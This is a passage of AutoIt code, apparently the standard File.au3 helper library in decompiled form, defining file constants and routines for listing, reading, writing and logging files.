$FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 
536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST $FLTAR_FILES = 1 GLOBAL CONST $FLTAR_FOLDERS = 2 GLOBAL CONST $FLTAR_NOHIDDEN = 4 GLOBAL CONST $FLTAR_NOSYSTEM = 8 GLOBAL CONST $FLTAR_NOLINK = 16 GLOBAL CONST $FLTAR_NORECUR = 0 GLOBAL CONST $FLTAR_RECUR = 1 GLOBAL CONST $FLTAR_NOSORT = 0 GLOBAL CONST $FLTAR_SORT = 1 GLOBAL CONST $FLTAR_FASTSORT = 2 GLOBAL CONST $FLTAR_NOPATH = 0 GLOBAL CONST $FLTAR_RELPATH = 1 GLOBAL CONST $FLTAR_FULLPATH = 2 FUNC _FILECOUNTLINES ($SFILEPATH ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = STRINGSTRIPWS (FILEREAD ($HFILEOPEN ) , $STR_STRIPTRAILING ) FILECLOSE ($HFILEOPEN ) RETURN UBOUND (STRINGREGEXP ($SFILEREAD , "\R" , $STR_REGEXPARRAYGLOBALMATCH ) ) + 1 - INT ($SFILEREAD = "" ) ENDFUNC FUNC _FILECREATE ($SFILEPATH ) 
LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , BITOR ($FO_OVERWRITE , $FO_CREATEPATH ) ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IFILEWRITE = FILEWRITE ($HFILEOPEN , "" ) FILECLOSE ($HFILEOPEN ) IF NOT $IFILEWRITE THEN RETURN SETERROR (2 , 0 , 0 ) RETURN 1 ENDFUNC FUNC _FILELISTTOARRAY ($SFILEPATH , $SFILTER = "*" , $IFLAG = $FLTA_FILESFOLDERS , $BRETURNPATH = FALSE ) LOCAL $SDELIMITER = "|" , $SFILELIST = "" , $SFILENAME = "" , $SFULLPATH = "" $SFILEPATH = STRINGREGEXPREPLACE ($SFILEPATH , "[\\/]+$" , "" ) & "\" IF $IFLAG = DEFAULT THEN $IFLAG = $FLTA_FILESFOLDERS IF $BRETURNPATH THEN $SFULLPATH = $SFILEPATH IF $SFILTER = DEFAULT THEN $SFILTER = "*" IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 0 , 0 ) IF STRINGREGEXP ($SFILTER , "[\\/:><\|]|(?s)^\s*$" ) THEN RETURN SETERROR (2 , 0 , 0 ) IF NOT ($IFLAG = 0 OR $IFLAG = 1 OR $IFLAG = 2 ) THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $HSEARCH = FILEFINDFIRSTFILE ($SFILEPATH & $SFILTER ) IF @ERROR THEN RETURN SETERROR (4 , 0 , 0 ) WHILE 1 $SFILENAME = FILEFINDNEXTFILE ($HSEARCH ) IF @ERROR THEN EXITLOOP IF ($IFLAG + @EXTENDED = 2 ) THEN CONTINUELOOP $SFILELIST &= $SDELIMITER & $SFULLPATH & $SFILENAME WEND FILECLOSE ($HSEARCH ) IF $SFILELIST = "" THEN RETURN SETERROR (4 , 0 , 0 ) RETURN STRINGSPLIT (STRINGTRIMLEFT ($SFILELIST , 1 ) , $SDELIMITER ) ENDFUNC FUNC _FILELISTTOARRAYREC ($SFILEPATH , $SMASK = "*" , $IRETURN = $FLTAR_FILESFOLDERS , $IRECUR = $FLTAR_NORECUR , $ISORT = $FLTAR_NOSORT , $IRETURNPATH = $FLTAR_RELPATH ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 1 , "" ) IF $SMASK = DEFAULT THEN $SMASK = "*" IF $IRETURN = DEFAULT THEN $IRETURN = $FLTAR_FILESFOLDERS IF $IRECUR = DEFAULT THEN $IRECUR = $FLTAR_NORECUR IF $ISORT = DEFAULT THEN $ISORT = $FLTAR_NOSORT IF $IRETURNPATH = DEFAULT THEN $IRETURNPATH = $FLTAR_RELPATH IF $IRECUR > 1 OR NOT ISINT ($IRECUR ) THEN RETURN SETERROR (1 , 6 , "" ) LOCAL $BLONGPATH = FALSE IF STRINGLEFT ($SFILEPATH , 4 ) == "\\?\" THEN 
$BLONGPATH = TRUE ENDIF LOCAL $SFOLDERSLASH = "" IF STRINGRIGHT ($SFILEPATH , 1 ) = "\" THEN $SFOLDERSLASH = "\" ELSE $SFILEPATH = $SFILEPATH & "\" ENDIF LOCAL $ASFOLDERSEARCHLIST [100 ] = [1 ] $ASFOLDERSEARCHLIST [1 ] = $SFILEPATH LOCAL $IHIDE_HS = 0 , $SHIDE_HS = "" IF BITAND ($IRETURN , 4 ) THEN $IHIDE_HS += 2 $SHIDE_HS &= "H" $IRETURN -= 4 ENDIF IF BITAND ($IRETURN , 8 ) THEN $IHIDE_HS += 4 $SHIDE_HS &= "S" $IRETURN -= 8 ENDIF LOCAL $IHIDE_LINK = 0 IF BITAND ($IRETURN , 16 ) THEN $IHIDE_LINK = 1024 $IRETURN -= 16 ENDIF LOCAL $IMAXLEVEL = 0 IF $IRECUR < 0 THEN STRINGREPLACE ($SFILEPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) $IMAXLEVEL = @EXTENDED - $IRECUR ENDIF LOCAL $SEXCLUDE_LIST = "" , $SEXCLUDE_LIST_FOLDER = "" , $SINCLUDE_LIST = "*" LOCAL $AMASKSPLIT = STRINGSPLIT ($SMASK , "|" ) SWITCH $AMASKSPLIT [0 ] CASE 3 $SEXCLUDE_LIST_FOLDER = $AMASKSPLIT [3 ] CONTINUECASE CASE 2 $SEXCLUDE_LIST = $AMASKSPLIT [2 ] CONTINUECASE CASE 1 $SINCLUDE_LIST = $AMASKSPLIT [1 ] ENDSWITCH LOCAL $SINCLUDE_FILE_MASK = ".+" IF $SINCLUDE_LIST <> "*" THEN IF NOT __FLTAR_LISTTOMASK ($SINCLUDE_FILE_MASK , $SINCLUDE_LIST ) THEN RETURN SETERROR (1 , 2 , "" ) ENDIF LOCAL $SINCLUDE_FOLDER_MASK = ".+" SWITCH $IRETURN CASE 0 SWITCH $IRECUR CASE 0 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH CASE 2 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH LOCAL $SEXCLUDE_FILE_MASK = ":" IF $SEXCLUDE_LIST <> "" THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FILE_MASK , $SEXCLUDE_LIST ) THEN RETURN SETERROR (1 , 3 , "" ) ENDIF LOCAL $SEXCLUDE_FOLDER_MASK = ":" IF $IRECUR THEN IF $SEXCLUDE_LIST_FOLDER THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FOLDER_MASK , $SEXCLUDE_LIST_FOLDER ) THEN RETURN SETERROR (1 , 4 , "" ) ENDIF IF $IRETURN = 2 THEN $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF ELSE $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF IF NOT ($IRETURN = 0 OR $IRETURN = 1 OR $IRETURN = 2 ) THEN RETURN SETERROR (1 , 5 , "" ) IF NOT ($ISORT = 0 OR $ISORT = 1 OR $ISORT = 2 ) THEN RETURN 
SETERROR (1 , 7 , "" ) IF NOT ($IRETURNPATH = 0 OR $IRETURNPATH = 1 OR $IRETURNPATH = 2 ) THEN RETURN SETERROR (1 , 8 , "" ) IF $IHIDE_LINK THEN LOCAL $TFILE_DATA = DLLSTRUCTCREATE ("struct;align 4;dword FileAttributes;uint64 CreationTime;uint64 LastAccessTime;uint64 LastWriteTime;" & "dword FileSizeHigh;dword FileSizeLow;dword Reserved0;dword Reserved1;wchar FileName[260];wchar AlternateFileName[14];endstruct" ) LOCAL $HDLL = DLLOPEN ("kernel32.dll" ) , $ADLL_RET ENDIF LOCAL $ASRETURNLIST [100 ] = [0 ] LOCAL $ASFILEMATCHLIST = $ASRETURNLIST , $ASROOTFILEMATCHLIST = $ASRETURNLIST , $ASFOLDERMATCHLIST = $ASRETURNLIST LOCAL $BFOLDER = FALSE , $HSEARCH = 0 , $SCURRENTPATH = "" , $SNAME = "" , $SRETPATH = "" LOCAL $IATTRIBS = 0 , $SATTRIBS = "" LOCAL $ASFOLDERFILESECTIONLIST [100 ] [2 ] = [[0 , 0 ] ] WHILE $ASFOLDERSEARCHLIST [0 ] > 0 $SCURRENTPATH = $ASFOLDERSEARCHLIST [$ASFOLDERSEARCHLIST [0 ] ] $ASFOLDERSEARCHLIST [0 ] -= 1 SWITCH $IRETURNPATH CASE 1 $SRETPATH = STRINGREPLACE ($SCURRENTPATH , $SFILEPATH , "" ) CASE 2 IF $BLONGPATH THEN $SRETPATH = STRINGTRIMLEFT ($SCURRENTPATH , 4 ) ELSE $SRETPATH = $SCURRENTPATH ENDIF ENDSWITCH IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "handle" , "FindFirstFileW" , "wstr" , $SCURRENTPATH & "*" , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN CONTINUELOOP ENDIF $HSEARCH = $ADLL_RET [0 ] ELSE $HSEARCH = FILEFINDFIRSTFILE ($SCURRENTPATH & "*" ) IF $HSEARCH = + 4294967295 THEN CONTINUELOOP ENDIF ENDIF IF $IRETURN = 0 AND $ISORT AND $IRETURNPATH THEN __FLTAR_ADDTOLIST ($ASFOLDERFILESECTIONLIST , $SRETPATH , $ASFILEMATCHLIST [0 ] + 1 ) ENDIF $SATTRIBS = "" WHILE 1 IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "int" , "FindNextFileW" , "handle" , $HSEARCH , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN EXITLOOP ENDIF $SNAME = DLLSTRUCTGETDATA ($TFILE_DATA , "FileName" ) IF $SNAME = ".." 
THEN CONTINUELOOP ENDIF $IATTRIBS = DLLSTRUCTGETDATA ($TFILE_DATA , "FileAttributes" ) IF $IHIDE_HS AND BITAND ($IATTRIBS , $IHIDE_HS ) THEN CONTINUELOOP ENDIF IF BITAND ($IATTRIBS , $IHIDE_LINK ) THEN CONTINUELOOP ENDIF $BFOLDER = FALSE IF BITAND ($IATTRIBS , 16 ) THEN $BFOLDER = TRUE ENDIF ELSE $BFOLDER = FALSE $SNAME = FILEFINDNEXTFILE ($HSEARCH , 1 ) IF @ERROR THEN EXITLOOP ENDIF $SATTRIBS = @EXTENDED IF STRINGINSTR ($SATTRIBS , "D" ) THEN $BFOLDER = TRUE ENDIF IF STRINGREGEXP ($SATTRIBS , "[" & $SHIDE_HS & "]" ) THEN CONTINUELOOP ENDIF ENDIF IF $BFOLDER THEN SELECT CASE $IRECUR < 0 STRINGREPLACE ($SCURRENTPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) IF @EXTENDED < $IMAXLEVEL THEN CONTINUECASE ENDIF CASE $IRECUR = 1 IF NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERSEARCHLIST , $SCURRENTPATH & $SNAME & "\" ) ENDIF ENDSELECT ENDIF IF $ISORT THEN IF $BFOLDER THEN IF STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERMATCHLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN IF $SCURRENTPATH = $SFILEPATH THEN __FLTAR_ADDTOLIST ($ASROOTFILEMATCHLIST , $SRETPATH & $SNAME ) ELSE __FLTAR_ADDTOLIST ($ASFILEMATCHLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF ELSE IF $BFOLDER THEN IF $IRETURN <> 1 AND STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF $IRETURN <> 2 AND STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF WEND IF $IHIDE_LINK THEN DLLCALL ($HDLL , "int" , "FindClose" , "ptr" , $HSEARCH ) ELSE FILECLOSE ($HSEARCH ) ENDIF WEND IF $IHIDE_LINK THEN DLLCLOSE ($HDLL ) ENDIF IF 
$ISORT THEN SWITCH $IRETURN CASE 2 IF $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST = $ASFOLDERMATCHLIST __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) CASE 1 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFILEMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST , 1 ) ENDIF CASE 0 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) $ASRETURNLIST [0 ] += $ASFOLDERMATCHLIST [0 ] REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] _ARRAYCONCATENATE ($ASRETURNLIST , $ASFOLDERMATCHLIST , 1 ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE LOCAL $ASRETURNLIST [$ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST [0 ] = $ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] __ARRAYDUALPIVOTSORT ($ASROOTFILEMATCHLIST , 1 , $ASROOTFILEMATCHLIST [0 ] ) FOR $I = 1 TO $ASROOTFILEMATCHLIST [0 ] $ASRETURNLIST [$I ] = $ASROOTFILEMATCHLIST [$I ] NEXT LOCAL $INEXTINSERTIONINDEX = $ASROOTFILEMATCHLIST [0 ] + 1 __ARRAYDUALPIVOTSORT ($ASFOLDERMATCHLIST , 1 , $ASFOLDERMATCHLIST [0 ] ) LOCAL $SFOLDERTOFIND = "" FOR $I = 1 TO $ASFOLDERMATCHLIST [0 ] $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFOLDERMATCHLIST [$I ] $INEXTINSERTIONINDEX += 1 IF $SFOLDERSLASH THEN $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] ELSE $SFOLDERTOFIND = $ASFOLDERMATCHLIST [$I ] & "\" ENDIF LOCAL $IFILESECTIONENDINDEX = 0 , $IFILESECTIONSTARTINDEX = 0 FOR $J = 1 TO $ASFOLDERFILESECTIONLIST [0 ] [0 ] IF $SFOLDERTOFIND = 
$ASFOLDERFILESECTIONLIST [$J ] [0 ] THEN $IFILESECTIONSTARTINDEX = $ASFOLDERFILESECTIONLIST [$J ] [1 ] IF $J = $ASFOLDERFILESECTIONLIST [0 ] [0 ] THEN $IFILESECTIONENDINDEX = $ASFILEMATCHLIST [0 ] ELSE $IFILESECTIONENDINDEX = $ASFOLDERFILESECTIONLIST [$J + 1 ] [1 ] + 4294967295 ENDIF IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASFILEMATCHLIST , $IFILESECTIONSTARTINDEX , $IFILESECTIONENDINDEX ) ENDIF FOR $K = $IFILESECTIONSTARTINDEX TO $IFILESECTIONENDINDEX $ASRETURNLIST [$INEXTINSERTIONINDEX ] = $ASFILEMATCHLIST [$K ] $INEXTINSERTIONINDEX += 1 NEXT EXITLOOP ENDIF NEXT NEXT ENDIF ENDSWITCH ELSE IF $ASRETURNLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASRETURNLIST [$ASRETURNLIST [0 ] + 1 ] ENDIF RETURN $ASRETURNLIST ENDFUNC FUNC __FLTAR_ADDFILELISTS (BYREF $ASTARGET , $ASSOURCE_1 , $ASSOURCE_2 , $ISORT = 0 ) REDIM $ASSOURCE_1 [$ASSOURCE_1 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_1 , 1 , $ASSOURCE_1 [0 ] ) $ASTARGET = $ASSOURCE_1 $ASTARGET [0 ] += $ASSOURCE_2 [0 ] REDIM $ASSOURCE_2 [$ASSOURCE_2 [0 ] + 1 ] IF $ISORT = 1 THEN __ARRAYDUALPIVOTSORT ($ASSOURCE_2 , 1 , $ASSOURCE_2 [0 ] ) _ARRAYCONCATENATE ($ASTARGET , $ASSOURCE_2 , 1 ) ENDFUNC FUNC __FLTAR_ADDTOLIST (BYREF $ALIST , $VVALUE_0 , $VVALUE_1 = + 4294967295 ) IF $VVALUE_1 = + 4294967295 THEN $ALIST [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] $ALIST [$ALIST [0 ] ] = $VVALUE_0 ELSE $ALIST [0 ] [0 ] += 1 IF UBOUND ($ALIST ) <= $ALIST [0 ] [0 ] THEN REDIM $ALIST [UBOUND ($ALIST ) * 2 ] [2 ] $ALIST [$ALIST [0 ] [0 ] ] [0 ] = $VVALUE_0 $ALIST [$ALIST [0 ] [0 ] ] [1 ] = $VVALUE_1 ENDIF ENDFUNC FUNC __FLTAR_LISTTOMASK (BYREF $SMASK , $SLIST ) IF STRINGREGEXP ($SLIST , "\\|/|:|\<|\>|\|" ) THEN RETURN 0 $SLIST = STRINGREPLACE (STRINGSTRIPWS (STRINGREGEXPREPLACE ($SLIST , "\s*;\s*" , ";" ) , $STR_STRIPLEADING + $STR_STRIPTRAILING ) , ";" , "|" ) $SLIST = STRINGREPLACE (STRINGREPLACE (STRINGREGEXPREPLACE ($SLIST , "[][$^.{}()+\-]" , "\\$0" ) , "?" , "." 
) , "*" , ".*?" ) $SMASK = "(?i)^(" & $SLIST & ")\z" RETURN 1 ENDFUNC FUNC _FILEPRINT ($SFILEPATH , $ISHOW = @SW_HIDE ) IF $ISHOW = DEFAULT THEN $ISHOW = @SW_HIDE RETURN SHELLEXECUTE ($SFILEPATH , "" , @WORKINGDIR , "print" , $ISHOW ) ENDFUNC FUNC _FILEREADTOARRAY ($SFILEPATH , BYREF $VRETURN , $IFLAGS = $FRTA_COUNT , $SDELIMITER = "" ) $VRETURN = 0 IF $IFLAGS = DEFAULT THEN $IFLAGS = $FRTA_COUNT IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" LOCAL $BEXPAND = TRUE IF BITAND ($IFLAGS , $FRTA_INTARRAYS ) THEN $BEXPAND = FALSE $IFLAGS -= $FRTA_INTARRAYS ENDIF LOCAL $IENTIRE = $STR_CHRSPLIT IF BITAND ($IFLAGS , $FRTA_ENTIRESPLIT ) THEN $IENTIRE = $STR_ENTIRESPLIT $IFLAGS -= $FRTA_ENTIRESPLIT ENDIF LOCAL $INOCOUNT = 0 IF $IFLAGS <> $FRTA_COUNT THEN $IFLAGS = $FRTA_NOCOUNT $INOCOUNT = $STR_NOCOUNT ENDIF IF $SDELIMITER THEN LOCAL $ALINES = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($ALINES ) + $IFLAGS IF $BEXPAND THEN LOCAL $IDIM_2 = UBOUND (STRINGSPLIT ($ALINES [0 ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) ) LOCAL $ATEMP_ARRAY [$IDIM_1 ] [$IDIM_2 ] LOCAL $IFIELDS , $ASPLIT FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ASPLIT = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $STR_NOCOUNT ) $IFIELDS = UBOUND ($ASPLIT ) IF $IFIELDS <> $IDIM_2 THEN RETURN SETERROR (3 , 0 , 0 ) ENDIF FOR $J = 0 TO $IFIELDS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] [$J ] = $ASPLIT [$J ] NEXT NEXT IF $IDIM_2 < 2 THEN RETURN SETERROR (4 , 0 , 0 ) IF $IFLAGS THEN $ATEMP_ARRAY [0 ] [0 ] = $IDIM_1 - $IFLAGS $ATEMP_ARRAY [0 ] [1 ] = $IDIM_2 ENDIF ELSE LOCAL $ATEMP_ARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 - $IFLAGS + 4294967295 $ATEMP_ARRAY [$I + $IFLAGS ] = STRINGSPLIT ($ALINES [$I ] , $SDELIMITER , $IENTIRE + $INOCOUNT ) NEXT IF $IFLAGS THEN $ATEMP_ARRAY [0 ] = $IDIM_1 - $IFLAGS ENDIF ENDIF $VRETURN = $ATEMP_ARRAY ELSE IF $IFLAGS THEN LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN 
SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = FILEREAD ($HFILEOPEN ) FILECLOSE ($HFILEOPEN ) IF STRINGLEN ($SFILEREAD ) THEN $VRETURN = STRINGREGEXP (@LF & $SFILEREAD , "(?|(\N+)\z|(\N*)(?:\R))" , 3 ) $VRETURN [0 ] = UBOUND ($VRETURN ) + 4294967295 ELSE RETURN SETERROR (2 , 0 , 0 ) ENDIF ELSE $VRETURN = FILEREADTOARRAY ($SFILEPATH ) IF @ERROR THEN $VRETURN = 0 RETURN SETERROR (@ERROR , 0 , 0 ) ENDIF ENDIF ENDIF RETURN 1 ENDFUNC FUNC _FILEWRITEFROMARRAY ($SFILEPATH , CONST BYREF $AARRAY , $IBASE = DEFAULT , $IUBOUND = DEFAULT , $SDELIMITER = "|" ) LOCAL $IRETURN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (2 , 0 , $IRETURN ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) IF $IDIMS > 2 THEN RETURN SETERROR (4 , 0 , 0 ) LOCAL $ILAST = UBOUND ($AARRAY ) + 4294967295 IF $IUBOUND = DEFAULT OR $IUBOUND > $ILAST THEN $IUBOUND = $ILAST IF $IBASE < 0 OR $IBASE = DEFAULT THEN $IBASE = 0 IF $IBASE > $IUBOUND THEN RETURN SETERROR (5 , 0 , $IRETURN ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "|" LOCAL $HFILEOPEN = $SFILEPATH IF ISSTRING ($SFILEPATH ) THEN $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_OVERWRITE ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , $IRETURN ) ENDIF LOCAL $IERROR = 0 $IRETURN = 1 SWITCH $IDIMS CASE 1 FOR $I = $IBASE TO $IUBOUND IF NOT FILEWRITE ($HFILEOPEN , $AARRAY [$I ] & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT CASE 2 LOCAL $STEMP = "" FOR $I = $IBASE TO $IUBOUND $STEMP = $AARRAY [$I ] [0 ] FOR $J = 1 TO UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 $STEMP &= $SDELIMITER & $AARRAY [$I ] [$J ] NEXT IF NOT FILEWRITE ($HFILEOPEN , $STEMP & @CRLF ) THEN $IERROR = 3 $IRETURN = 0 EXITLOOP ENDIF NEXT ENDSWITCH IF ISSTRING ($SFILEPATH ) THEN FILECLOSE ($HFILEOPEN ) RETURN SETERROR ($IERROR , 0 , $IRETURN ) ENDFUNC FUNC _FILEWRITELOG ($SLOGPATH , $SLOGMSG , $IFLAG = + 4294967295 ) LOCAL $IOPENMODE = $FO_APPEND LOCAL $SDATENOW = @YEAR & "-" & @MON & "-" & @MDAY LOCAL $STIMENOW = @HOUR & ":" & @MIN & ":" & @SEC LOCAL $SMSG = 
$SDATENOW & " " & $STIMENOW & " : " & $SLOGMSG IF $IFLAG = DEFAULT THEN $IFLAG = + 4294967295 IF $IFLAG <> + 4294967295 THEN $IOPENMODE = $FO_OVERWRITE $SMSG &= @CRLF & FILEREAD ($SLOGPATH ) ENDIF LOCAL $HFILEOPEN = $SLOGPATH IF ISSTRING ($SLOGPATH ) THEN $HFILEOPEN = FILEOPEN ($SLOGPATH , $IOPENMODE ) ENDIF IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IRETURN = FILEWRITELINE ($HFILEOPEN , $SMSG ) IF ISSTRING ($SLOGPATH ) THEN $IRETURN = FILECLOSE ($HFILEOPEN ) IF $IRETURN <= 0 THEN RETURN SETERROR (2 , $IRETURN , 0 ) RETURN $IRETURN ENDFUNC FUNC _FILEWRITETOLINE ($SFILEPATH , $ILINE , $STEXT , $BOVERWRITE = FALSE ) IF $ILINE <= 0 THEN RETURN SETERROR (4 , 0 , 0 ) IF NOT ISSTRING ($STEXT ) THEN $STEXT = STRING ($STEXT ) IF $STEXT = "" THEN RETURN SETERROR (6 , 0 , 0 ) ENDIF 